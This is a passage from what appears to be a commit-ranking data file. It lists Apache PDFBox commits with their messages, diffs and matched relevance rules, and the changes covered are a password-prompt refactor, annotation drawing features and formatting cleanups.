"BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4279", - "relevance": 2 - } - ] - }, - { - "commit_id": "fdc7132221c6f21922d4e83ccf93d7fa935d4fe8", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527004459, - "hunks": 13, - "message": "PDFBOX-2941: new internal class to also support password entry loop for URLs but avoid double code git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1832038 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "index e7a5656d5..10733952e 100644", - "--- a/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "+++ b/debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java", - "@@ -1263,3 +1263,3 @@ public class PDFDebugger extends JFrame", - "- private void readPDFFile(File file, String password) throws IOException", - "+ private void readPDFFile(final File file, String password) throws IOException", - " {", - "@@ -1275,3 +1275,13 @@ public class PDFDebugger extends JFrame", - " recentFiles.removeFile(file.getPath());", - "- parseDocument( file, password );", - "+ DocumentOpener documentOpener = new DocumentOpener(password)", - "+ {", - "+ @Override", - "+ PDDocument open() throws IOException", - "+ {", - "+ return PDDocument.load(file, password);", - "+ }", - "+ };", - "+ document = documentOpener.parse();", - "+ printMenuItem.setEnabled(true);", - "+ reopenMenuItem.setEnabled(true);", - "@@ -1291,3 +1301,3 @@ public class PDFDebugger extends JFrame", - "- private void readPDFurl(String urlString, String password) throws IOException", - "+ private void readPDFurl(final String urlString, String password) throws IOException", - " {", - "@@ -1302,4 +1312,11 @@ public class PDFDebugger extends JFrame", - " currentFilePath = urlString;", - "- URL url = new URL(urlString);", - "- document = PDDocument.load(url.openStream(), password);", - "+ DocumentOpener documentOpener = new DocumentOpener(password)", - "+ {", - "+ @Override", - "+ PDDocument open() throws IOException", - "+ {", - "+ return PDDocument.load(new URL(urlString).openStream(), password);", - "+ }", - "+ };", - "+ document = documentOpener.parse();", - " printMenuItem.setEnabled(true);", - "@@ -1341,41 +1358,64 @@ public class PDFDebugger extends JFrame", - " }", - "- ", - "+", - " /**", - "- * This will parse a document.", - "- *", - "- * @param file The file addressing the document.", - "- *", - "- * @throws IOException If there is an error parsing the document.", - "+ * Internal class to avoid double code in password entry loop.", - " */", - "- private void parseDocument( File file, String password )throws IOException", - "+ abstract class DocumentOpener", - " {", - "- while (true)", - "+ String password;", - "+", - "+ DocumentOpener(String password)", - " {", - "- try", - "- {", - "- document = PDDocument.load(file, password);", - "- }", - "- catch (InvalidPasswordException ipe)", - "+ this.password = password;", - "+ }", - "+", - "+ /**", - "+ * Override to load the actual input type (File, URL, stream), don't call it directly!", - "+ * ", - "+ * @return", - "+ * @throws IOException ", - "+ */", - "+ abstract PDDocument open() throws IOException;", - "+", - "+ /**", - "+ * Call this!", - "+ * ", - "+ * @return", - "+ * @throws IOException ", - "+ */", - "+ final PDDocument parse() throws IOException ", - "+ {", - "+ PDDocument document;", - "+ while (true)", - " {", - "- // https://stackoverflow.com/questions/8881213/joptionpane-to-get-password", - "- JPanel panel = new JPanel();", - "- JLabel label = new JLabel(\"Password:\");", - "- JPasswordField pass = new JPasswordField(10);", - "- panel.add(label);", - "- panel.add(pass);", - "- String[] options = new String[] {\"OK\", \"Cancel\"};", - "- int option = JOptionPane.showOptionDialog(null, panel, \"Enter password\",", - "- JOptionPane.NO_OPTION, JOptionPane.PLAIN_MESSAGE,", - "- null, options, \"\");", - "- if (option == 0)", - "+ try", - " {", - "- password = new String(pass.getPassword());", - "- continue;", - "+ document = open();", - " }", - "- throw ipe;", - "+ catch (InvalidPasswordException ipe)", - "+ {", - "+ // https://stackoverflow.com/questions/8881213/joptionpane-to-get-password", - "+ JPanel panel = new JPanel();", - "+ JLabel label = new JLabel(\"Password:\");", - "+ JPasswordField pass = new JPasswordField(10);", - "+ panel.add(label);", - "+ panel.add(pass);", - "+ String[] options = new String[]", - "+ {", - "+ \"OK\", \"Cancel\"", - "+ };", - "+ int option = JOptionPane.showOptionDialog(null, panel, \"Enter password\",", - "+ JOptionPane.NO_OPTION, JOptionPane.PLAIN_MESSAGE,", - "+ null, options, \"\");", - "+ if (option == 0)", - "+ {", - "+ password = new String(pass.getPassword());", - "+ continue;", - "+ }", - "+ throw ipe;", - "+ }", - "+ break;", - " }", - "- break;", - "- } ", - "- printMenuItem.setEnabled(true);", - "- reopenMenuItem.setEnabled(true);", - "+ return document;", - "+ }", - " }" - ], - "changed_files": [ - "debugger/src/main/java/org/apache/pdfbox/debugger/PDFDebugger.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-2941": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "fb81da13f20333adcd5b1143dc0382ace12815ae" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-2941", - "relevance": 2 - } - ] - }, - { - "commit_id": "9930acc88c3330fac1ba6a314c4003e0ec56fea1", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1523126880, - "hunks": 1, - "message": "PDFBOX-4071: fix formatting git-svn-id: https://svn.apache.org/repos/asf/pdfbox/branches/2.0@1828609 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", - "index 597958353..4e5a881d7 100644", - "--- a/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", - "+++ b/tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java", - "@@ -338,3 +338,2 @@ public final class PDFToImage", - " page.setCropBox(rectangle);", - "-", - " }" - ], - "changed_files": [ - "tools/src/main/java/org/apache/pdfbox/tools/PDFToImage.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4071": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "a369d43367a244580c6dd910e834d559eac4c380" - ] - ], - "tags": [ - "2.0.10", - "2.0.11", - "2.0.12", - "2.0.13", - "2.0.14", - "2.0.15", - "2.0.16", - "2.0.17", - "2.0.18", - "2.0.19", - "2.0.20", - "2.0.21", - "2.0.22", - "2.0.23", - "2.0.24", - "2.0.25", - "2.0.26", - "2.0.27", - "2.0.28", - "2.0.29", - "2.0.30", - "2.0.31", - "2.0.32" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4071", - "relevance": 2 - } - ] - }, - { - "commit_id": "1ba9b8838cc7943fa512319fab5e1a86e924d398", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1530635351, - "hunks": 3, - "message": "PDFBOX-4259: add a polygon annotation git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1835005 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java", - "index cfe20eb30..56db227ef 100644", - "--- a/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java", - "+++ b/examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java", - "@@ -79,2 +79,3 @@ public final class AddAnnotations", - " PDColor blue = new PDColor(new float[] { 0, 0, 1 }, PDDeviceRGB.INSTANCE);", - "+ PDColor green = new PDColor(new float[] { 0, 1, 0 }, PDDeviceRGB.INSTANCE);", - " PDColor black = new PDColor(new float[] { 0, 0, 0 }, PDDeviceRGB.INSTANCE);", - "@@ -271,2 +272,20 @@ public final class AddAnnotations", - "+ PDAnnotationPolygon polygon = new PDAnnotationPolygon();", - "+ position = new PDRectangle();", - "+ position.setLowerLeftX(pw - INCH);", - "+ position.setLowerLeftY(ph - INCH);", - "+ position.setUpperRightX(pw - 2 * INCH);", - "+ position.setUpperRightY(ph - 2 * INCH);", - "+ polygon.setRectangle(position);", - "+ polygon.setColor(blue);", - "+ polygon.setInteriorColor(green);", - "+ float[] vertices = { pw - INCH, ph - 2 * INCH, ", - "+ pw - 1.5f * INCH, ph - INCH, ", - "+ pw - 2 * INCH, ph - 2 * INCH }; ", - "+ polygon.setVertices(vertices);", - "+ polygon.setBorderStyle(borderThick);", - "+ polygon.setContents(\"Polygon annotation\");", - "+ annotations.add(polygon);", - "+", - "+", - " // add the \"Helv\" font to the default resources", - "@@ -285,3 +304,3 @@ public final class AddAnnotations", - " dr.put(COSName.getPDFName(\"Helv\"), PDType1Font.HELVETICA);", - "- ", - "+", - " // Create the appearance streams." - ], - "changed_files": [ - "examples/src/main/java/org/apache/pdfbox/examples/pdmodel/AddAnnotations.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-4259": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "80f293a66998f2d154e664235ecd5506849b1d0d" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-4259", - "relevance": 2 - } - ] - }, - { - "commit_id": "6da59cd67d243eaed2ca2fc0ac0d73953ebbac27", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528139986, - "hunks": 5, - "message": "PDFBOX-3353: don't rotate non angled styles git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832887 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "index 96c3f4c6a..bf6d65593 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java", - "@@ -126,7 +126,5 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - "- // do a transform so that first \"arm\" is imagined flat, like in line handler", - "- // the alternative would be to apply the transform to the LE shapes directly,", - "- // which would be more work and produce code difficult to understand", - "- // paint the styles here and after line(s) draw, to avoid line crossing a filled shape", - "+ // paint the styles here and after line(s) draw, to avoid line crossing a filled shape ", - " if (\"FreeTextCallout\".equals(annotation.getIntent())", - "+ // check only needed to avoid q cm Q if LE_NONE", - " && !LE_NONE.equals(annotation.getLineEndingStyle())", - "@@ -134,3 +132,2 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- // check only needed to avoid q cm Q if LE_NONE", - " float x2 = pathsArray[2];", - "@@ -139,5 +136,17 @@ public class PDFreeTextAppearanceHandler extends PDAbstractAppearanceHandler", - " float y1 = pathsArray[1];", - "- double angle = Math.atan2(y2 - y1, x2 - x1);", - " cs.saveGraphicsState();", - "- cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "+ if (ANGLED_STYLES.contains(annotation.getLineEndingStyle()))", - "+ {", - "+ // do a transform so that first \"arm\" is imagined flat,", - "+ // like in line handler.", - "+ // The alternative would be to apply the transform to the ", - "+ // LE shape coordinates directly, which would be more work ", - "+ // and produce code difficult to understand", - "+ double angle = Math.atan2(y2 - y1, x2 - x1);", - "+ cs.transform(Matrix.getRotateInstance(angle, x1, y1));", - "+ }", - "+ else", - "+ {", - "+ cs.transform(Matrix.getTranslateInstance(x1, y1));", - "+ }", - " drawStyle(annotation.getLineEndingStyle(), cs, 0, 0, ab.width, hasStroke, hasBackground);" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDFreeTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [ - [ - "no-tag", - "fcfb4c8f116f3b720471490472b740d6e085f544" - ], - [ - "no-tag", - "5f68cb39b2d541ab7e76aff63bb0f5bf9e818de2" - ] - ], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "COMMIT_HAS_TWINS", - "message": "This commit has one or more twins.", - "relevance": 2 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "23b99ef8938f828abc66bb1bf297124da981edbe", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1528477650, - "hunks": 17, - "message": "PDFBOX-3353: support /Circle and /Insert; use the Adobe width for /Note; draw circle counterclockwise git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1833197 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "index 83a00d9cb..7f80bdcdf 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "@@ -367,3 +367,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " /**", - "- * Add a circle shape to the path.", - "+ * Add a circle shape to the path in clockwise direction.", - " *", - "@@ -374,3 +374,3 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - " * ", - "- * @throws IOException If the content stream could not be written", - "+ * @throws IOException If the content stream could not be written.", - " */", - "@@ -388,2 +388,25 @@ public abstract class PDAbstractAppearanceHandler implements PDAppearanceHandler", - "+ /**", - "+ * Add a circle shape to the path in counterclockwise direction. You'll need this e.g. when", - "+ * drawing a doughnut shape. See \"Nonzero Winding Number Rule\" for more information.", - "+ *", - "+ * @param cs Content stream", - "+ * @param x", - "+ * @param y", - "+ * @param r Radius", - "+ *", - "+ * @throws IOException If the content stream could not be written.", - "+ */", - "+ void addCircle2(PDAppearanceContentStream cs, float x, float y, float r) throws IOException", - "+ {", - "+ // http://stackoverflow.com/a/2007782/535646", - "+ float magic = r * 0.551784f;", - "+ cs.moveTo(x, y + r);", - "+ cs.curveTo(x - magic, y + r, x - r, y + magic, x - r, y);", - "+ cs.curveTo(x - r, y - magic, x - magic, y - r, x, y - r);", - "+ cs.curveTo(x + magic, y - r, x + r, y - magic, x + r, y);", - "+ cs.curveTo(x + r, y + magic, x + magic, y + r, x, y + r);", - "+ cs.closePath();", - "+ }", - "+", - " private static Set createShortStyles()", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "index b76e2e372..a4d003c6c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java", - "@@ -22,5 +22,7 @@ import org.apache.pdfbox.pdmodel.PDAppearanceContentStream;", - " import org.apache.pdfbox.pdmodel.common.PDRectangle;", - "+import org.apache.pdfbox.pdmodel.graphics.blend.BlendMode;", - "+import org.apache.pdfbox.pdmodel.graphics.color.PDColor;", - "+import org.apache.pdfbox.pdmodel.graphics.state.PDExtendedGraphicsState;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotation;", - " import org.apache.pdfbox.pdmodel.interactive.annotation.PDAnnotationText;", - "-import org.apache.pdfbox.pdmodel.interactive.annotation.PDAppearanceStream;", - "@@ -51,5 +53,7 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " PDAnnotationText annotation = (PDAnnotationText) getAnnotation();", - "- if (!PDAnnotationText.NAME_NOTE.equals(annotation.getName()))", - "+ if (!PDAnnotationText.NAME_NOTE.equals(annotation.getName()) &&", - "+ !PDAnnotationText.NAME_INSERT.equals(annotation.getName()) &&", - "+ !\"Circle\".equals(annotation.getName()))", - " {", - "- //TODO Comment, Key, Help, NewParagraph, Paragraph, Insert", - "+ //TODO Comment, Key, Help, NewParagraph, Paragraph", - " return;", - "@@ -59,11 +63,19 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " {", - "- boolean hasBackground = contentStream.setNonStrokingColorOnDemand(getColor());", - "+ PDColor bgColor = getColor();", - "+ if (bgColor == null)", - "+ {", - "+ // White is used by Adobe when /C entry is missing", - "+ contentStream.setNonStrokingColor(1f);", - "+ }", - "+ else", - "+ {", - "+ contentStream.setNonStrokingColor(bgColor);", - "+ }", - "+ // stroking color is always black which is the PDF default", - "+", - " setOpacity(contentStream, annotation.getConstantOpacity());", - "- //TODO find out what Adobe chooses if color is missing", - "-", - " PDRectangle rect = getRectangle();", - "- PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - " PDRectangle bbox = rect.createRetranslatedRectangle();", - "- appearanceStream.setBBox(bbox);", - "+ annotation.getNormalAppearanceStream().setBBox(bbox);", - "@@ -72,3 +84,9 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " case PDAnnotationText.NAME_NOTE:", - "- drawNote(contentStream, bbox, hasBackground);", - "+ drawNote(contentStream, bbox);", - "+ break;", - "+ case \"Circle\": //TODO constant", - "+ drawCircles(contentStream, bbox);", - "+ break;", - "+ case PDAnnotationText.NAME_INSERT:", - "+ drawInsert(contentStream, bbox);", - " break;", - "@@ -78,3 +96,2 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "-", - " }", - "@@ -84,10 +101,10 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " }", - "-", - " }", - "- private void drawNote(final PDAppearanceContentStream contentStream, PDRectangle bbox, boolean hasBackground)", - "+ private void drawNote(final PDAppearanceContentStream contentStream, PDRectangle bbox)", - " throws IOException", - " {", - "- contentStream.setLineJoinStyle(1); // round edge", - "- contentStream.addRect(1, 1, bbox.getWidth() - 2, bbox.getHeight() - 2);", - "+ contentStream.setLineJoinStyle(1); // get round edge the easy way", - "+ contentStream.setLineWidth(0.61f); // value from Adobe", - "+ contentStream.addRect(1, 1, bbox.getWidth() - 2, bbox.getHeight() - 2);", - " contentStream.moveTo(bbox.getWidth() / 4, bbox.getHeight() / 7 * 2);", - "@@ -100,3 +117,54 @@ public class PDTextAppearanceHandler extends PDAbstractAppearanceHandler", - " contentStream.lineTo(bbox.getWidth() * 3 / 4 - 1, bbox.getHeight() / 7 * 5);", - "- contentStream.drawShape(1, true, hasBackground);", - "+ contentStream.fillAndStroke();", - "+ }", - "+", - "+ private void drawCircles(final PDAppearanceContentStream contentStream, PDRectangle bbox)", - "+ throws IOException", - "+ {", - "+ // strategy used by Adobe:", - "+ // 1) add small circle in white using /ca /CA 0.6 and width 1", - "+ // 2) fill", - "+ // 3) add small circle in one direction", - "+ // 4) add large circle in other direction", - "+ // 5) stroke + fill", - "+ // with square width 20 small r = 6.36, large r = 9.756", - "+", - "+ // should be a square, but who knows...", - "+ float min = Math.min(bbox.getWidth(), bbox.getHeight());", - "+ float smallR = min / 20 * 6.36f;", - "+ float largeR = min / 20 * 9.756f;", - "+", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(1);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.saveGraphicsState();", - "+ contentStream.setLineWidth(1);", - "+ PDExtendedGraphicsState gs = new PDExtendedGraphicsState();", - "+ gs.setAlphaSourceFlag(false);", - "+ gs.setStrokingAlphaConstant(0.6f);", - "+ gs.setNonStrokingAlphaConstant(0.6f);", - "+ gs.setBlendMode(BlendMode.NORMAL);", - "+ contentStream.setGraphicsStateParameters(gs);", - "+ contentStream.setNonStrokingColor(1f);", - "+ addCircle(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, smallR);", - "+ contentStream.fill();", - "+ contentStream.restoreGraphicsState();", - "+", - "+ contentStream.setLineWidth(0.59f); // value from Adobe", - "+ addCircle(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, smallR);", - "+ addCircle2(contentStream, bbox.getWidth() / 2, bbox.getHeight() / 2, largeR);", - "+ contentStream.fillAndStroke();", - "+ }", - "+", - "+ private void drawInsert(final PDAppearanceContentStream contentStream, PDRectangle bbox)", - "+ throws IOException", - "+ {", - "+ contentStream.setMiterLimit(4);", - "+ contentStream.setLineJoinStyle(0);", - "+ contentStream.setLineCapStyle(0);", - "+ contentStream.setLineWidth(0.59f); // value from Adobe", - "+ contentStream.moveTo(bbox.getWidth() / 2 - 1, bbox.getHeight() - 2);", - "+ contentStream.lineTo(1, 1);", - "+ contentStream.lineTo(bbox.getWidth() - 2, 1);", - "+ contentStream.closeAndFillAndStroke();", - " }" - ], - "changed_files": [ - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDAbstractAppearanceHandler.java", - "pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDTextAppearanceHandler.java" - ], - "message_reference_content": [], - "jira_refs": { - "PDFBOX-3353": "" - }, - "ghissue_refs": {}, - "cve_refs": [], - "twins": [], - "tags": [ - "3.0.0", - "3.0.0-RC1", - "3.0.0-alpha2", - "3.0.0-alpha3", - "3.0.0-beta1", - "3.0.1", - "3.0.2" - ], - "matched_rules": [ - { - "id": "CHANGES_RELEVANT_CODE", - "message": "The commit modifies code containing relevant filename or methods: PDF", - "relevance": 8 - }, - { - "id": "BUG_IN_MESSAGE", - "message": "The commit message references some bug tracking ticket: PDFBOX-3353", - "relevance": 2 - } - ] - }, - { - "commit_id": "b5ba2d8b9b57d4627dcdd7e28318584be4c44921", - "repository": "https://github.com/apache/pdfbox", - "timestamp": 1527269612, - "hunks": 86, - "message": "PDFBOX-3353: remove unneeded \"try\" level git-svn-id: https://svn.apache.org/repos/asf/pdfbox/trunk@1832257 13f79535-47bb-0310-9956-ffa450edef68", - "diff": [ - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "index b6edaf311..b9968a4ac 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCaretAppearanceHandler.java", - "@@ -57,30 +57,27 @@ public class PDCaretAppearanceHandler extends PDAbstractAppearanceHandler", - "- try", - "+ PDAnnotationCaret annotation = (PDAnnotationCaret) getAnnotation();", - "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", - " {", - "- PDAnnotationCaret annotation = (PDAnnotationCaret) getAnnotation();", - "- try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", - "- {", - "- contentStream.setStrokingColor(getColor());", - "- contentStream.setNonStrokingColor(getColor());", - "- ", - "- setOpacity(contentStream, annotation.getConstantOpacity());", - "+ contentStream.setStrokingColor(getColor());", - "+ contentStream.setNonStrokingColor(getColor());", - "- PDRectangle rect = getRectangle();", - "- PDRectangle bbox = new PDRectangle(rect.getWidth(), rect.getHeight());", - "- annotation.getNormalAppearanceStream().setBBox(bbox);", - "+ setOpacity(contentStream, annotation.getConstantOpacity());", - "- float halfX = rect.getWidth() / 2;", - "- float halfY = rect.getHeight() / 2;", - "- contentStream.moveTo(0, 0);", - "- contentStream.curveTo(halfX, 0,", - "- halfX, halfY, ", - "- halfX, rect.getHeight());", - "- contentStream.curveTo(halfX, halfY, ", - "- halfX, 0,", - "- rect.getWidth(), 0);", - "- contentStream.closePath();", - "- contentStream.fill();", - "- // Adobe has an additional stroke, but it has no effect", - "- // because fill \"consumes\" the path.", - "- }", - "+ PDRectangle rect = getRectangle();", - "+ PDRectangle bbox = new PDRectangle(rect.getWidth(), rect.getHeight());", - "+ annotation.getNormalAppearanceStream().setBBox(bbox);", - "+", - "+ float halfX = rect.getWidth() / 2;", - "+ float halfY = rect.getHeight() / 2;", - "+ contentStream.moveTo(0, 0);", - "+ contentStream.curveTo(halfX, 0,", - "+ halfX, halfY, ", - "+ halfX, rect.getHeight());", - "+ contentStream.curveTo(halfX, halfY, ", - "+ halfX, 0,", - "+ rect.getWidth(), 0);", - "+ contentStream.closePath();", - "+ contentStream.fill();", - "+ // Adobe has an additional stroke, but it has no effect", - "+ // because fill \"consumes\" the path.", - " }", - "diff --git a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", - "index 9263be6eb..42e73cd6c 100644", - "--- a/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", - "+++ b/pdfbox/src/main/java/org/apache/pdfbox/pdmodel/interactive/annotation/handlers/PDCircleAppearanceHandler.java", - "@@ -58,66 +58,63 @@ public class PDCircleAppearanceHandler extends PDAbstractAppearanceHandler", - " float lineWidth = getLineWidth();", - "- try", - "+ PDAnnotationCircle annotation = (PDAnnotationCircle) getAnnotation();", - "+ try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", - " {", - "- PDAnnotationCircle annotation = (PDAnnotationCircle) getAnnotation();", - "- try (PDAppearanceContentStream contentStream = getNormalAppearanceAsContentStream())", - "+ boolean hasStroke = contentStream.setStrokingColorOnDemand(getColor());", - "+ boolean hasBackground = contentStream", - "+ .setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "+", - "+ setOpacity(contentStream, annotation.getConstantOpacity());", - "+", - "+ contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", - "+ PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", - "+", - "+ // Acrobat applies a padding to each side of the bbox so the line is completely within", - "+ // the bbox.", - "+ // TODO: Needs validation for Circles as Adobe Reader seems to extend the bbox bei the rect differenve", - "+ // for circle annotations.", - "+ PDRectangle bbox = getRectangle();", - "+ PDRectangle borderEdge = getPaddedRectangle(bbox,lineWidth/2);", - "+", - "+ if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", - " {", - "- boolean hasStroke = contentStream.setStrokingColorOnDemand(getColor());", - "- boolean hasBackground = contentStream", - "- .setNonStrokingColorOnDemand(annotation.getInteriorColor());", - "- ", - "- setOpacity(contentStream, annotation.getConstantOpacity());", - "- ", - "- contentStream.setBorderLine(lineWidth, annotation.getBorderStyle());", - "- PDBorderEffectDictionary borderEffect = annotation.getBorderEffect();", - "- ", - "- // Acrobat applies a padding to each side of the bbox so the line is completely within", - "- // the bbox.", - "- // TODO: Needs validation for Circles as Adobe Reader seems to extend the bbox bei the rect differenve", - "- // for circle annotations.", - "- PDRectangle bbox = getRectangle();", - "- PDRectangle borderEdge = getPaddedRectangle(bbox,lineWidth/2);", - "- ", - "- if (borderEffect != null && borderEffect.getStyle().equals(PDBorderEffectDictionary.STYLE_CLOUDY))", - "- {", - "- CloudyBorder cloudyBorder = new CloudyBorder(contentStream,", - "- borderEffect.getIntensity(), lineWidth, getRectangle());", - "- cloudyBorder.createCloudyEllipse(annotation.getRectDifference());", - "- annotation.setRectangle(cloudyBorder.getRectangle());", - "- annotation.setRectDifference(cloudyBorder.getRectDifference());", - "- PDAppearanceStream appearanceStream = annotation.getNormalAppearanceStream();", - "- appearanceStream.setBBox(cloudyBorder.getBBox());", - "- appearanceStream.setMatrix(cloudyBorder.getMatrix());", - "- }", - "- else", - "- {", - "- // the differences rectangle", - "- setRectDifference(lineWidth);", - "- ", - "- // lower left corner", - "- float x0 = borderEdge.getLowerLeftX();", - "- float y0 = 